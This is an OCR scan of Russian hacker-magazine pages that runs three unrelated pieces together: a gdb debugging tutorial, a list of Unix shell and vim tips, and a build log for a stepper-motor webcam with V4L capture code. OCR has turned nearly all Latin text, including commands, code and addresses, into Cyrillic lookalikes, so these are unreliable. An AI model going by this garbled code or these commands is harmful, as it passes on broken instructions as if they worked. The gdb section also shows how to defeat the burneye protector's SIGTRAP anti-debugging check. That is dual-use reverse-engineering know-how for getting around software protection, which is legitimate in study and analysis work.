манды: зіері п (зі п) и пехіі п (пі п). зіері п 
(зі п) выполняет п следующих инструкций 
с заходом в циклы и функции, а пехіі п (пі п) 
— беззахода. При запуске без аргументов 
выполняется только одна инструкция. На- 
жатие на <Епіег> автоматически повторя- 
ет последнюю команду (зіері или пехіі), что 
значительно ускоряет трассировку. Кста- 
ти, лупить по <Епіег> намного удобнее, 
чем давить на любую из функциональных 
клавиш, используемых для трассировки 
ѴѴіпбоѵѵз-отладчиками. 

Команды зіер п/пехі п (упоминание о кото- 
рых можно найти в документации на дсІЬ) 
ориентированы на работу с исходными 
текстами и выполняют п строк, а при отсутс- 
твии символьной информации трассируют 
программу вплоть до ее завершения, что 
не есть хорошо. 

□ Точки останова 

Отладчик дсІЬ поддерживает два типа точек 
останова: останов по выполнению кода — 
Ьгеакроіпі и останов по обращению к дан- 
ным (также называемый точками наблюде- 
ния) — ѵѵаісЬ-роіпі. Еще дсІЬ поддерживает 
точки перехвата, но для отладки программ 
без исходных текстов они практически 
бесполезны. 

Точки останова могут быть как программны- 
ми, так и аппаратными. Программная точка 
останова по выполнению на х86-платформе 
представляет собой однобайтовую инструк- 
цию ОСИ (1!\1Т ОЗЬ). Программный ѵѵаісЬ-роіпі 
реализуется путем пошаговой трассировки 



программы с отслеживанием обращений к 
подопытной ячейке, что крайне непроизво- 
дительно, а, кроме того, некоторые програм- 
мы просто не позволяют себя трассировать. 
Аппаратных точек останова на х86 всего 
четыре, программных же можно устанавли- 
вать сколько угодно. 

Программная точка останова по испол- 
нению задается командой Ьгеак (Ь), за 
которой следует имя функции/адрес/ре- 
гистр или переменная, например: Ь таіп, 
Ь *0х80484ВС. Команда іЬгеак (іЬ) уста- 
навливает одноразовую точку останова, 
которая автоматически удаляется при сра- 
батывании. Аппаратная точка останова за- 
дается командой ЬЬгеак (ЬЬ), а временная 
аппаратная точка — командой іЬЬгеак(іЬЬ). 
После установки аппаратной точки остано- 
ва отладчик сообщает: «Нагсіѵѵаге аззізіесі 
Ьгеакроіпі N аі адрес», но это еще не зна- 
чит, что операция завершилась успешно. 
Для проверки можно установить хоть тыся- 
чу аппаратных точек останова, и все будет 
О’К, но вот только при запуске программы 
командами гип или сопііпие отладчик может 
сообщить: «ѴѴагпіпд: Саппоі іпзегі Ьагсіѵѵаге 
Ьгеакроіпі !\І». 

Аппаратные точки наблюдения на запись 
ячейки задаются командой ѵѵаісЬ (ѵѵа). 
Команды гѵѵаісЬ (гѵѵ) и аѵѵаісЬ (аѵѵ) уста- 
навливают точки наблюдения на чтение и 
чтение/запись, соответственно (например 
гѵѵ *0хВРРРРА50, а вот гѵѵ *$езр уже не сра- 
батывает, и отладчик сообщает «Аііетрі іо 
бегеіегепсе а депегіс роіпіег»). Как и в слу- 
чае с точками останова по выполнению, со- 
общение «Нагсіѵѵаге геасі ѵѵаісЬроіпі !\І: ад- 
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> Попытка отладки программы, защищенной протектором 
Ьигпеуе, с реакцией на сигналы по умолчанию, заканчивается 
полным провалом 




рес» не означает ровным счетом ничего, и 
при попытке запуска/продолжения выпол- 
нения программы отладчик может сказать: 
«СоиІсІ по! іпзег! Ьагсіѵѵаге ѵѵаІсМроіп! І\І», 
обламывая нас по полной программе. 

Все точки наблюдения/останова могут быть 
условными, то есть срабатывать только в 
том случае, если значение выражения, сто- 
ящего после іТ, истинно, например: «Ь !оо іі 
$еах==0» или «гѵѵ*0хВРРРРА60 і!(*((ипзідпесІ 

іпі*)$езр)!=0х669)». 

При установке всякой точки наблюдения/ 
останова отладчик присваивает ей номер, 
который, во-первых, высвечивается при ее 
срабатывании, аво-вторых, можетбыть ис- 
пользован в командах управления точками 
наблюдения/останова. РІомер последней 
сработавшей точки останова автоматичес- 
ки заносится в переменную $Ьрпит. 

В данном случае номер точки наблюдения/ 
останова равен единице 

(дсІЬ) РіЬ таіп 



Нагсіѵѵаге аззізіесі Ьгеакроіпі 1 аі 0х80483е! 

(дсІЬ)г 

Зіагііпд ргодгат:/Іпоте/крпс/дсІЬ/дсІЬ_сІето 
Вгеакроіпі 1 , 0х080483еі іп таіп () 

Команда ідпоге п х устанавливает счетчик 
игнорирования точки наблюдения/остано- 
вап, пропуская первыехсрабатываний, что 
особенно полезно в циклах. 

Если при срабатывании точки остано- 
ва/наблюдения необходимо выполнить 
некоторую последовательность опера- 
ций, можно воспользоваться командой 
соттапсіз п, где п — номер точки наблю- 
дения/останова. Пример использования 
команды показан ниже: 

Здесь при срабатывании точки номер 6 бу- 
дет выведено приветствие «НеІІо, ѵѵогісі!» 

соттапсіз 6 
ргіпіТ "ЬеІІо, ѵѵогісГмТ 1 
епсіз 



Получить информацию по точкам остано- 
ва поможет команда іпТо Ьгеак (і Ь, или іпТо 
ѵѵаІсЬроіпІз). При запуске без аргументов 
она выдаст данные о состоянии всех точек 
наблюдения/останова. Если же необходимо 
«проэкзаменовать» какую-то конкретную 
точку наблюдения/останова, достаточно 
указать ее номер, например: 

Просмотр информации о точке наблюдения 
номер 13 

(дсІЬ) і ЫЗ 

І\Іит Туре йізр ЕпЬ Асісігезз ѴѴЬаі 
1 3 геасі ѵѵаісЬроіпі кеер у *1 3451 3676 
зіоропІуіІ$еах==4 
(дсІЬ) 

Команда сіеаг (она же беіеіе) используется 
для удаления точек наблюдения/останова. 
При запуске без аргументов она удаляет 
все точки (при этом отладчик запрашива- 
ет подтверждение). Если же необходимо 
убрать какую-то одну конкретную точку, 
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достаточно задать ѳѳ номер, например 
сіеіеіе 13. Кроме того, можно удалить це- 
лый диапазон точек останова/наблюдения: 
сіеіеіе 1-6 удаляет точки наблюдения с пер- 
вой по шестую включительно и никакого 
подтверждения при этом не запрашивает- 
ся, так что будь на чеку! 

Команды епаЫе и сІізаЫе используются для 
временного включения/выключения точек 
наблюдения/останова и имеюттот жесамый 
синтаксис, что и беіеіе. 



Отображение дампа программы с помощью 
командых 

# просмотр 1 6 двойных слов в Гіех-виде, начиная от $рс 
(дсІЬ)х/16х$рс 

0х80483е! <таіп+9>: 0хЬ8Юе483 0x00000000 

0х04с7с429 0x00000624 
0x80483!! <таіп+25>: 0х!!Ь!е800 0х458сЖ! 

0x24048988 0х!!!еЬ4е8 

0x804840! <таіп+41>: ОхЭОсЗсЭ!! 0x90909090 
0x90909090 0x90909090 

0x804841 ! <таіп+57>: 0хе5895590 0х!631 5657 



ргіпіТ "%08ХГі:",$агд0 

ѵѵЬІІе$ЬЬсІ_р++ < 16 

ргіпі! " %02Х",*(ипзідпесІ сЬаг*)$агд0++ 

епсі 

ргіпі! "\п" 
епсі 

А вот пример ее использования: 

Дамп памяти, выведенный пользователь- 
ской командой сісісі 



О Работа с памятью и регистрами 

Дамп памяти для хакеров — это святое. Без 
него не обходится ни один взлом. Просмат- 
ривать/модифицировать память можно 
разными способами, например с помощью 
команды ргіпі/ргіпі!: 

Чтение и модификация памяти при помощи 
команды р (ргіпі) 

# вывод содержимого двойного слова в десятичном 
беззнаковом виде 

(дсІЬ) р/и *0х80483е! 

$5 = 3102794883 

# присвоение регистру езр значения 0 
(дсІЬ) р$езр = 0 

$6 = (ѵоісі *)0х0 

# присвоение значения 90Гі байту по адресу 80484135 
(дсІЬ) р/х *((сЬаг*) 0x804841 3)=0х90 

$7 = 0x90 



0х0сес8353 0х0000а0е8 

# просмотр 1 6 байт слов в Гіех-виде, начиная от $рс 
(дсІЬ)х/16хЬ$рс 

0х80483е! <таіп+9>: 0x83 0хе4 ОхГО 

0хЬ8 0x00 0x00 0x00 0x00 

0х80483!7 <таіп+17>: 0x29 0хс4 0хс7 

0x04 0x24 0x06 0x00 0x00 

Хакеров, начинающих свой жизненный путь 
с дсІЬ, такая форма подачи информации быть 
может и устроит, но пользователям ЗоЙІСЕ она 
покажется слишком расточительной. Хоро- 
шо бы получить классический Ьех-дамп... И 
это действительно можно сделать! Достаточ- 
но создать реализацию своей собственной 
команды (назовем ее сісісі), отображающей 
дамп с помощью функции ргіпі!. В отличие от 
Зо!!ІСЕ,отладчикдсІЬ бесконечно расширяем, 
и если нас что-то не устаивает, практически 
всегда можно переделать это под свой вкус. 



(дсІЬ) зеі $1 = $езр 
(дсІЬ) сісісі $1 

ВРРРРА505: 8Е РР 7701 Е0РАРРВР386Е 
ВРРРРА5А5: 01 4034 РВ РР ВР 94 РА РР ВР 
ВРРРРА645: 00420340887701 402Р 00 

Необходимость введения дополнительной пе- 
ременной (в данном случае это переменная $і) 
объясня ется тем, что команда сісісі спроекти- 
рована так, чтобы отображать по 1 0Н байт за 
раз, начиная с указанного адреса, а при на- 
жатии на <Епіег> (в дсІЬ — повтор последней 
команды) — следующие 1 0Н байт и т.д. При 
этом переданный команде аргумент использу- 
ется для хранения последнего отображенного 
адреса. Вызов сісісі $езр приведет к тому, что 
значение регистра $езр окажется увеличен- 
ным на 10Ь и программа просто развалится. 
Естественно, при желании можно переписать 
команду сісісі так, чтобы она не имела никаких 
побочных эффектов и отображала не 1 0Ь байт 
памяти, а ровно столько, сколько ей скажут. 




Однако при просмотре большого количества 
ячеек памяти выгоднее использовать специ- 
альную команду х, позволяющую задавать 
длину отображаемого блока памяти: 



Код пользовательской команды сісісі, выво- 
дящий дамп в стиле 8оі1ІСЕ и ІигЬо-сіеЬиддег 

сІеЛпе сісісі 
зеІ$сІсІсІ_р = 0 



□ Обработка сигналов 

Сигналом называется асинхронное собы- 
тие, происходящее в программе и чем-то 






^ ипіхоігі 



напоминающее структурные исключения 
в ѴѴіпсІоѵѵз. Сигналы делятся на фатальные 
и нефатальные. Примером нефатального 
сигнал а является 810 АІ_ЯМ, возбуждаемый 
при срабатывании интервального тайме- 
ра. А вот при нарушении доступа к памяти 
генерируется сигнал 8ІОЗЕОѴ, завершаю- 
щий программу в аварийной режиме, если 
только программист не предусмотрел спе- 
циальный обработчик. 

Отладчик дбЬ перехватывает все сигналы 
и в зависимости от своей конфигурации 
либо передает сигнал программе, либо 
«поглощает» его, делая вид, что ничего ин- 
тересного не происходит. 

Посмотреть текущую конфигурацию дсІЬ 
можно с помощью команды іпТо зідпаіз 
(она же іпТо бапсііе), а для изменения ре- 
акции дсІЬ необходимо воспользоваться 
«бапсііе сигнал поведение», где «сигнал» 
— название сигнала, например 8І08Е0Ѵ, а 
«поведение» — реакция отладчика на воз- 
никновение сигнала, описываемая следу- 
ющими ключевыми словами: 
пог*ор — при получении этого сигнала дсІЬ 
не останавливает программу; 

5*ор — при получении этого сигнала дсІЬ ос- 
танавливает программу; 
ргіп{ — при получении данного сигнала дсІЬ 
выводит сообщение о нем наэкран; 
гюргіп* — дсІЬ не замечает этот сигнал; 
ра55 — дбЬ позволяет программе увидеть 
этот сигнал; 

гюрагг — дсІЬ маскирует этотсигнал, не поз- 
воляя программе увидеть его. 



Некоторые сигналы, например сигнал 
ЗІОТПАР, возникающий при достижении 
программной точки останова, отлад- 
чик резервирует для своих собственных 
нужд. Этим обстоятельством пользуются 
многие защищенные программы, опреде- 
ляющие, находятся ли они под отладкой 
или нет (трюк проделывается за счет ус- 
тановки своего собственного обработчи- 
ка ЗІОТРАР и последующего выполнения 
инструкции ІІМТ 036). При выполнении без 
дсІЬ управление получает обработчик, в 
противном случае сигнал поглощается 
отладчиком и обработчик уже не получает 
управление. 

Файлы, упакованные протектором Ьигпеуе, 
содержат следующий код: 

Дизассемблерный фрагмент файла, защи- 
щенного протектором Ьигпеуе 



0x05371 4Ы 


тоѵ $0х30,%есІх 


0x05371 4Ь6 


тоѵ %есІх,%еах 


0x05371 4Ь8 


іпі $0x80 


0x05371 4Ьа 


асісі $0х5375а00,%езі 


0x0537 14с0 


тоѵ %езі,0хШсІ24 



(%еЬр) 



0x05371 4с6: 


іпіЗ 




0x05371 4с7: 


стрі 


$0x0,0x5375748 


0x05371 4се: 


Іпе 


0x537 14е2 


0x05371 аОс: 


ризГі 


%еЬр 


0x05371 аОсІ: 


тоѵ 


%езр,%еЬр 


0x05371 аОТ 


ІПСІ 


0x5375748 


0x05371 аі 5: 


Іеаѵе 




0x05371 аі 6: 


геі 





Попытка отладки программы в нормальном 
режиме приводит к ее краху, если, конечно, 
в момент возбуждения сигнала не увеличить 
содержимое ячейки 53757486 на единицу. 

Но существует гораздо более простой и эле- 
гантный путь. Дождавшись «ругательства» от- 
ладчика по поводу поимки сигнала 8І0ТРАР, 
мы даем команду ЬапсІІе 8І0ТРАР разз и пе- 
редаем программе управление командой 
сопііпие. И все будет работать как часы! 

□ Заключение 

Вот мы и познакомились с основными воз- 
можностями могучего отладчика дсІЬ. Од- 
нако это лишь малая часть того, на что он 
способен. Все остальное содержится в 
штатной документации и исходных текстах 
(документация, как водится, имеет мно- 
жество упущений). Тем не менее, для боль- 
шинства хакерских задач рассмотренных 
нами команд будет вполне достаточно. И-И 

> Передача программе сигнала ЗІѲТВАР 
вводит защиту в заблуждение, и отладка 
проходит успешно 
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СЕГОДНЯШНЯЯ ПОДБОРКА СОВЕТОВ КАК ВСЕГДА ПЕСТРИТ РАЗНООБРАЗИЕМ. МНОЖЕСТВО СОВЕТОВ РАЗБИТО ПО РАЗ- 
ДЕЛАМ И УЖЕ ГОТОВО К УПОТРЕБЛЕНИЮ. ИЗ ЭТОГО ВЫПУСКА ТЫ УЗНАЕШЬ, КАК СДЕЛАТЬ РАБОТУ С ЗЗН БОЛЕЕ ЭФ- 
ФЕКТИВНОЙ, КАК ОБРАБОТАТЬ БОЛЬШОЕ КОЛИЧЕСТВО ФАЙЛОВ И ПРЕОБРАЗОВАТЬ ИХ В ДРУГОЙ ФОРМАТ, А ТАКЖЕ 
КАК НАУЧИТЬСЯ ПРАВИЛЬНОЙ РАБОТЕ С ШЕЛЛОМ. КРОМЕ ТОГО, ТЕБЯ ЖДЕТ ТРАДИЦИОННЫЙ РАЗДЕЛ, ПОСВЯЩЕННЫЙ 
РАБОТЕ С МУЛЬТИМЕДИА. ПОСТИГАЙ МОЩЬ ІЛЧІХ, И ПУСТЬ МАШИНА РАБОТАЕТ ЗА ТЕБЯ. 





Два варианта конвертирования файла Информативная статусная строка: 
МЗЭОС втекст: 






І$саШос!іІе^ос>!іІе^ 

|$ апііѵѵогсі НІе.сІос > іііе. 1x1 




I: зеі Іа8із1:а1:и5=2І 






тключение полосы прокрутки, Удаление лишних символов ( Л М) из тексто- Меню, вызываемое при автодополнении: 
создание зазора между текстом вых ЭОЗ-файлов: : зеіѵѵіЮтепи 

и краями окна хіегт (добавить в $ соі -Ьх <Тііе_сіоз. іхі > Тііе_ипіх. іхі 
-/.Хсіеіаиііз): Учим клавишу Васкзрасе удалять все, вклю- 

Одновременное копирование вывода ко- чая переводы строк: 
манды в файл и на экран: :зеіЬз=2 




Ыеі 

Перенаправление вывода команды с уда- БИеІІ 
ленной машины: Поиск в истории: 

СігІ+Р 



Смена кодировки файла: 
І ; е++епс=СР125іИ 

Установка шрифта для дѵіт: 

|: зеі диііопІ=Іисі(^а\СопзоіеП2И 



Перенаправление вывода команды на уда- Перейти к началу строки 
ленную машину: Сігі+, 

$ соттапсІІ ззіп Ііозі саі\> іііе 

Перейти к концу строки: 

Перенос каталога на удаленную машину со Сігі+е 
сжатием и сохранением прав доступа: 

Удалить все символы от курсора до конца Отключение «распальцовки» в Ыпих: 

#ср/еіс/іпіііаЬ ~ 



Бузіет 

Отключение «распальцовки» в РгееВЗЭ:! 
сопЦСЕЫЕВЮ 



|$ іаг -ст\ - сіігесіогу I ззИ Гюзі іаг -хгі -И 

строки: 

Компрессия данных, передаваемых по Сігі+к 
ззИ-каналу: 

$ ззИ -С ІІОЗІ 



Синхронизация времени с ЫТР-сервером: 
# пірсіаіе 1 94. 1 86.254. 22| 




Отправка письма из командной строки: 

$ саі теззаде.іхі I таіі пате@Гю5і.огдД 



Запуск команды из истории по маске: 

$! маска 

Записать вывод команды в переменную: 

$ ѴАР=' ісісі/Ьіп/із' 



Арифметические операции прямо из шелла: 

$есІпо$(( 1024*640)) 




зесГАсіПаІісІеф 
ср ~/іпіиаЬ/е^/і п іПаЬ 



Назначение опций по умолчанию для сѵз (до- 
бавить в ~/.сѵзгс): 




Рііез 

Установка битов исполнения только на ката- Копирование файлов со сходными именами: 
логи ифайлы, которыеужемогутисполнять- $ср ітаде {1 ..100} сіігесіоп 
ся каким-либо пользователем: 

Правый промпт для 2 зб (показывает время и 
номер консоли): 

$ ехрогі ВРВОМРТ=' %Т %у %Ь' 





Создание вложенных каталогов: 



Ѵіт 

Конвертирование тап-страницы в текстовый Включение/выключение нумерации строк 
файл: :зе1питЬег 

: зеі попитЬег 




. 



Выключение ПК в определенное время: 

# зІпиГсІоѵѵп -И 07:00 

Выключение ПК через 2 часа: 

И# есГю "/зЬіп/ГіаІі" I аі поѵѵ + 21тоигз^И 

МиШтесііа 

Разбиение фильма на две части: 

|$ тепсосіег іиІІ.аѵі -оѵс сору -оас соруД 
Епфов 01 :00:00-о рагі1^^^| 

|$ тепсосіег іиІІ.аѵі -оѵс сору^оассоруД 

зз 01:00:00 -о рагі2.аѵі 
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РАООТ 

/ 8АиЕРР@МАІЬ.НЦ / 




ПРОГРАММИРУЕМ САМОХОДНУЮ 
ВЕБ-КАМЕРУ ПОД ЛИНУКСІ 



еуе ОР Ше 
хакер 



постоянно возникало желание подвигать 
мышкой, чтобы повертеть головой, как в 
шутере. Собственно говоря, а почему бы и 
нет? Можно попробовать это организовать. 
Не ошибается только тот, кто ничего не де- 
лает. Мысль созрела следующая — поса- 
дить камеру на сервоприводы, которые бы 
подчинялись движениям мыши, вращая 
наш электронный глаз в заданном направ- 
лении и создавая таким образом полное 
кибер-единение юзера с периферийным 
устройством. 

Реализовать данную задумку было реше- 
но с помощью двух шаговых моторов, так 
я получал приличную точность при враще- 
нии приводов и жесткую фиксацию поло- 
жения камеры (чего бы не получилось при 
использовании «аналоговых» моторов). 
Управлять моторами проще всего через 
І_РТ-порт. При таком подходе сам аппарат- 
ный контроллер будет очень прост, а боль- 
шинство контрольной логики можно реа- 
лизовать на стороне софта. Конечно, есть 
материнки, на которых не реализован І_РТ- 



порт, но интерфейс этого порта настолько 
прост, что я не смогудержаться. 

□ Что нам понадобится 

Итак, из найденного по антресолям мы име- 
ем на руках следующие компоненты: 

1. Собственно камера-яйцо БодііесИ 
ОиіскСапп ЕхргеззІІ, или любая другая, какая 
есть под рукой. 

2. Два шаговых мотора, выковырянных из 
старых пятидюймовых дисководов. Доводов 
в их пользу у меня несколько. Во-первых, они 
униполярные, а контроллер и софт для уни- 
полярных моторов сделать намного проще, 
чем для биполярных. А во-вторых, других у 
меня в тот момент просто не было ;). 

3. Две микросхемы СІБМ2003 в подходящем 
формфакторе (я брал с суффиксом АІ\І) и 



какая-нибудь монтажная плата (можно са- 
мостоятельного изготовления) для их раз- 
мещения, покупается в Чип-и-дипе, этоядро 
аппаратного контроллера. На практике 
каждая такая микросхема представляет со- 
бой пачку транзисторных ключей с защитой 
и, при желании, легко реализуется вручную, 
но мы сложных путей не ищем. 

4. Молекс для подключения питания в 
1 2 вольт и хвостотстарого принтера для под- 
ключения к І_РТ-порту. 

5. Пара пятипиновых колодок для комфорт- 
ного подключения моторов и 8 светодиодов 
для отладки (необязательно, но удобно). Если 
есть желание теститься на светодиодах, то 
еще 8 резисторов по 380 Ом, чтобы не попа- 
лить светодиоды напряжением в 1 2 вольт. 

6. Советский конструктор «Школьник», из ко- 



БЫЛ0ДЕЛ0, ПОПАЛА МНЕ В РУКИ ДЕ- 
ШЕВАЯ БОбІТЕСН'ОВСКАЯ ВЕБ-КАМЕРА 
И Я СКОРЕЕ ПОБЕЖАЛ ПРИКРУЧИВАТЬ 
ЕЕ К СВОЕМУ КРАСНОГЛАЗОМУ ЛИНУК- 
СУ. ПОДНЯЛАСЬ КАМЕРА НАУДИВЛЕ- 
НИЕ БЫСТРО И БЕЗО ВСЯКИХ БУБНОВ. 
НАБЛЮДАТЬ КАРТИНКУ, КОТОРУЮ ОНА 
ИСПРАВНО ВЫДАВАЛА ЧЕРЕЗ ХАѴѴТѴ, 
МНЕ БЫСТРО НАДОЕЛО, И В ГОЛОВЕ 
СТАЛИ ЗРЕТЬ МЫСЛИ, ЧЕГО БЫ ТАКОГО 
ИНТЕРЕСНОГО ЕЩЕ С НЕЙ ЗАМУТИТЬ... 

огда я смотрел в окно хаѵѵіѵ, 
демонстрирующем коридор с 
дверью ванной комнаты, у меня 
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«Если долбить в І-РТ- порт с тактовой частотой процессора, 
то якорь просто не будет успевать повернуться в сторону нужной 
обмотки, поэтому после записи значения в порт нужно сделать паузу» 




> Нехитрые приготовления 

торого будем собирать шасси. Я добыл такой 
в магазине «Детский мир» по пути с работы. 

О Шаговые моторы, лирика 

Чтобы было понятно, что делать дальше, не- 
много углубимся в принцип работы униполяр- 
ных шаговых моторов. На самом деле, тут все 
очень просто — есть набор обмоток, распо- 
ложенных по кругу (в нашем случае 4 штуки), 
и вращающийся якорь, который, как стрелка 
компаса, поворачивается в сторону той об- 



мотки, на которую подано напряжение. Таким 
образом, последовательно подавая напряже- 
ние на обмотки по кругу, мы можем вращать 
якорь мотора шагами по 90 градусов. Такой 
огромный угол шага нас неустроит. Поэтому в 
моторе устанавливаем механический редук- 
тор, и шаг поворота выходящей оси в итоге 
составляет 1-3 градуса. Также есть возмож- 
ность фиксации положения — удерживая на- 
пряжение на одной из обмоток, мы удержива- 
ем якорь и ось мотора в текущем положении. 



Теперь нам нужно выяснить, где общий 
провод питания и какие провода каким об- 
моткам принадлежат. Замерив попарно со- 
противление между всеми проводами, мы 
обнаружим провод, в паре с которым сопро- 
тивление в 2 раза меньше, чем в остальных 
парах, — это и есть общий провод питания. 
Далее берем 12 вольт, соединяем питание с 
общим проводом, а землю — поочередно с 
обмотками. На 180 градусов якорь не повер- 
нется, только на 90. Соответственно, по тому, 
дернулся якорь или нет, определяем, лежат 
обмотки рядом или напротив друг друга. 

□ Нагсіѵѵаге 

Настала пора собрать имеющееся железо 
воедино. В результате нескольких попыток 
и модификаций, мне удалось смастерить из 
конструктора шасси, позволяющее мото- 
рам поворачивать камеру в вертикальной и 
горизонтальной плоскостях. 

Далее нам нужно соединить обмотки мото- 
ров и баіа-биты І_РТ-порта сквозь транзис- 
торные ключи. Обмотоку нас 8 (2 мотора, по 
4 обмотки в каждом), а ключей в одной мик- 
росхеме 1)І_М2003 как назло только семь, так 
что их нам понадобится две. Чтобы не мучить 
себя вопросом, пожег ли ты микросхемы 
долгой/горячей пайкой или нет, советую ку- 
пить к ним две колодки и распаивать именно 
их, а потом вставлять туда микросхемы. Так- 
же советую сначала вместо обмоток распа- 
ять 8 светодиодов через сопротивления по 
380 Ом. Это позволит увидеть, загорается ли 
нужный светодиод при подаче единички в 
нужный бит и гаснет ли при подаче нуля, 
или что-то где-то отвалилось, или звенит, 



РиЫіс-интерфейс класса 0СЕ_5РСА_Сатега 



сіазз (ХЕ_ЗРСА_Сатега { 
риЫіс: 

ОСЕ_ЗРСА_Сатега (ѵоісі); 
~(ХЕ_ЗРСА_Сатега (); 

ЬооІ іпіі (ѵоісі); 

ипзідпесі сГіаг * деіЕгате (ѵоісі); 
ипзідпесі сГіаг * деіОІ_Егате (ѵоісі); 
іпідеіѴѴІсІіЬ (ѵоісі); 
іпідеіНеідЬі (ѵоісі); 



ЬооІ зеіНезоіиііоп (іпі гез); 

ЬооІ зеіВгідГііпезз (ипзідпесі зЬогі іпі і); 
ЬооІ зеіНие (ипзідпесі зЬогі іпі і); 

ЬооІ зеіСоІог (ипзідпесі зЬогі іпі і); 

ЬооІ зеіСопігазі (ипзідпесі зГюгі іпі і); 
ЬооІ зеіѴѴГіііепезз (ипзідпесі зЬогі іпі і); 

іпідеіПезоІиііоп (ѵоісі); 
іпі деіВгідГііпезз (ѵоісі); 
іпідеіНие (ѵоісі); 



іпі деіСоіог (ѵоісі); 
іпі деіСопігазі (ѵоісі); 
іпі деіѴѴГіііепезз (ѵоісі); 

ЬооІ аиіоВгідГіі (ѵоісі); 
ЬооІ аиіоѴѴГіііе (ѵоісі); 

1 
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и нужно переделывать. Силовое питание в 
12 вольт возьмем прямо из башни компью- 
тера. Для этого нам и нужен молекс. То, что 
у меня получилось, и подробности монтажа 
можно увидеть на схемах и фотографиях. 

□ БоНѵѵаге 

Теперь определимся с архитектурой управ- 
ляющего софта. Итак, нам понадобятся: 

1 . Модуль видеозахвата. Будем реализо- 
вывать его через интерфейс Ѵ4І_, посколь- 
ку Ѵ4І_-2 еще не слишком распространен, 
а о других интерфейсах я вообще ничего не 
слышал. 

> Пользовательский интерфейс 



2. Модуль управления шаговыми мото- 
рами. Моторы у нас подсоединены через 
БРТ-порт, и есть 2 пути — либо писать свой 
драйвер, либо писать значения в І/О-порты 
из изег-зрасе, благо Ііпих позволяет делать 
это из-под гооі'а. Я выбрал второй вариант, 
так как он более простой. 

3. Пользовательский интерфейс, отобра- 
жающий картинку с камеры посредством 
модуля 1 и управляющий моторами пос- 
редством модуля 2. Интерфейс я решил 
делать с использованием ТгоІІіесН ОТ, люб- 
люя эту библиотеку загибкость иудобство 
процесса разработки. 



ОѴігіео4І_іпих 

Работа с видеозахватом реализована в 
Ііпих классически — данные читаются из 
файла устройства (допустим, /беѵ/ѵісІеоО), 
а настройки производятся с помощью іосіі- 
вызовов для дескриптора этого же файла. 
Данный интерфейс имеет название Ѵ4І_ 
(Ѵісіео іог Ііпих), его описание присутствует в 
заголовочном файле Ііпих/ѵісІеосІеѵ.Іп. 
Начинаем с того, что открываем файл каме- 
ры и получаем ее свойства: 

іпі ѵсІеѵ_ісІ; 

зігисі ѵісІео_сараЬІІІіу ѵісіеосар; 

1!((ѵсІеѵ_ісІ=ореп («/сІеѵ/ѵісІеоО», О_ВОѴѴВ))<0) 
геіигпіаізе; 

іДіосіі (ѵсІеѵДсІ, ѴЮІОСѲСАР, &ѵіс1еосар)!=0) 
геіигпіаізе; 

іД! (ѵісіеосар. 1:уре&ѴЮ_ТѴРЕ_САРТІІВЕ)) геіигп іаізе; 

Так как у меня веб-камера, а не тюнер с кучей 
каналов (не эфирных, а аппаратных — аудио, 
видео, телетекста и прочих), то я не буду за- 
морачиваться с выбором нужного канала 
посредством ѴЮІОСОСНАІ\І/ѴЮІОС$СНАІ\І, 
а сразу перейду к настройке параметров 
картинки, запрошу текущие параметры, 
поправлю необходимые мне и установлю 
обратно: 

зігисі ѵісІео_рісіиге ѵісіеорісі; 
іДіосіІ (ѵсіеѵ.ісі, ѴЮІОСОРІСТ, &ѵіс1еорісі)!=0) 
геіигпіаізе; 
ѵісіеорісі. сІеріГі=24; 

ѵісіеорісі. раІеііе=ѴЮЕО_РАІ_ЕТТЕ_Р(ЗВ24; 
іДіосіІ (ѵсіеѵ.ісі, ѴЮІОСЗРІСТ, &ѵіс1еорісі)!=0) 
геіигпіаізе; 




/ 126 



ХАКЕР 1 1 /95/ 06 




^ согііпд 



„2К. 










ч 



I 



|ішг* 



> Определяем соттоп-роѵѵег 





> Нір://ѵѵѵѵѵѵ.сІос.іс.ас.ик/ 
-ІІі/сІос/зіеррег/ — здесь 
много информации 
о шаговых моторах и 
ссылок на аналогичные 
проекты. 
Иіір://зоигсеіогде. 
пеі/ргоіесіз/зрса50х/ 

— драйвер для моей 
камеры, в Ресіога Соге 5 
его не было. 



Затем установим разрешение видеозахвата. Я став- 
лю максимальное из ранее полученных от камеры 
свойств: 

зігисіѵісІео_ѵѵіпсІоѵѵ ѵісіеоѵѵіп; 
іі (іосіі (ѵбеѵ_ісІ, ѴЮІОСОѴѴІІЧ &ѵібеоѵѵіп)!=0) 
геіитіаізе; 

ѵісіеоѵѵіп. ѵѵісШт=ѵісІеосар. тахѵѵісШт; 
ѵісіеоѵѵіп. Гіеідііі=ѵісІеосар. тахГіеідІгі; 
іі (іосіі (ѵсіеѵ.ісі, ѴЮІОСЗѴѴІЫ, &ѵібеоѵѵіп)!=0) 
геіитіаізе; 

Теперь все готово ктому, чтобы читать кадры из дескрип- 
тор а ѵсІеѵ_ТсІ, например, воттак: 

сііагігате_Ьиі [ѵісіеоѵѵіп. ѵѵісШг*ѵісІеоѵѵіп. Гіеідііі*ѵісІеорісі. берііУ8]={0}; 
іі (геасі (ѵбеѵ_ісІ, ігате_Ьиі, зігеоі (ігате_Ьиі))! =зігеоі (ігате_Ьиі)) 
геіитіаізе; 

Но... это неспортивно ;). Сейчас объясню почему. Каж- 
дый вызов геаб блокируется на время формирования 
кадра, а между вызовами камера простаивает. Учитывая 
невысокий РРЗ дешевых веб-камер, это недопустимо. 
Нужно сделать так, чтобы во время обработки текуще- 
го кадра камера уже формировала следующий, то есть 
организовать боиЫеЬиііегіпд. Делается это с помощью 
ттар. Суть такова — можно сказать камере, чтобы она 
началаформирование кадра, а самому не блокировать- 
ся, а заниматься своими делами. Для использования 
ттар нужно получить параметры мэпинга и заттар'ить 
сам файл камеры: 

зігисі ѵібео_тЬиі ѵібеоЬиі; 
ипзідпесі сЬаг * ѵЬиі_ріг; 
іі (іосіі (ѵсіеѵ.ісі, ѴЮІОСОМВІІЕ, &ѵібеоЬиі)!=0) 
геіитіаізе; 

іі ((ѵЬиі_ріг=(ипзідпесІ сііаг *) ттар (0, ѵібеоЬиі. зіге, РВОТ_ВЕАОІ 



РВОТ_\Л/ВІТЕ, МАР_ЗНАВЕО, ѵбеѵ_ісІ, 0))==МАР_ЕАІІ_ЕО) 
геіигпіаізе; 

Теперь можно приступить к захвату в режиме 
боиЫеЬиіегіпд. Синхронизируемся с формированием 
кадра, копируем кадр из ттар-указателя в рабочий бу- 
фер, запускаем на формирование следующий кадр, от- 
правляем рабочий буфер на обработку. Таким образом, 
пока идет обработка, камера не теряет времени даром, 
формируя нам следующий кадр: 

зігисі ѵібео_ттар ѵттар; 
ѵттар. Гіеідііі = ѵісіеоѵѵіп. ГіеідЬі; 
